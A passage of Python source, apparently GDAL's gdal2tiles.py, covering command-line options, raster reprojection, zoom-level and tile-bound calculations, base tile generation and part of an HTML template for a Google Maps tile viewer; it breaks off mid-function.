help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if not args:
exit_with_error("You need to specify at least an input file as argument to the script")
if len(args) > 2:
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
# Default output: a directory named after the input file (without extension) in the current directory
output_folder = os.path.splitext(os.path.basename(input_file))[0]
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'antialias' and not numpy_available:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
exclude_transparent = False
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
self.isepsg4326 = None
self.in_srs_wkt = None
# Tile format
self.tile_size = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp()
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read a bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big the query window should be for scaling down
# (reset later according to the chosen resampling algorithm)
self.querysize = 4 * self.tile_size
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tile_size
elif self.options.resampling == 'bilinear':
self.querysize = self.tile_size * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?" %
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile in ('mercator', 'geodetic'):
if not in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs ESPG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator()
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tile_size))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))),
math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size)))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz + 1))
self.tsize = list(range(0, self.tmaxz + 1))
for tz in range(0, self.tmaxz + 1):
tsize = 2.0**(self.nativezoom - tz) * self.tile_size
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x * self.tile_size * pixelsizex
east = west + self.tile_size * pixelsizex
south = self.ominy + y * self.tile_size * pixelsizex
north = south + self.tile_size * pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml'))):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tile_size, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ty, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# Don't scale up by nearest neighbour; instead change the querysize
# to the native resolution (and return a smaller query tile) for scaling
if self.options.profile in ('mercator', 'geodetic'):
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tile_size in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
if tz >= self.nativezoom:
querysize = self.tile_size
rx = (tx) * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
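# TMS tile rows count from the bottom of the raster, so convert ty to a top-origin pixel offset.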
ry = ysize - (ty * tsize) - rysize
wx, wy = 0, 0
wxsize = int(rxsize / float(tsize) * self.tile_size)
wysize = int(rysize / float(tsize) * self.tile_size)
if wysize != self.tile_size:
wy = self.tile_size - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ty, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tile_size,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
exclude_transparent=self.options.exclude_transparent,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For a given dataset and a query in cartographic coordinates, returns parameters for
ReadRaster() in raster coordinates and x/y shifts (for border tiles). If querysize is not
given, the extent is returned in the native resolution of the dataset ds.
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
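# (rx, ry, rxsize, rysize) is the window read from the source raster; (wx, wy, wxsize, wysize)
# is where that data is placed inside the destination query window (shifted for edge tiles).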
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tile_size, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339 / 2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125 / 2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
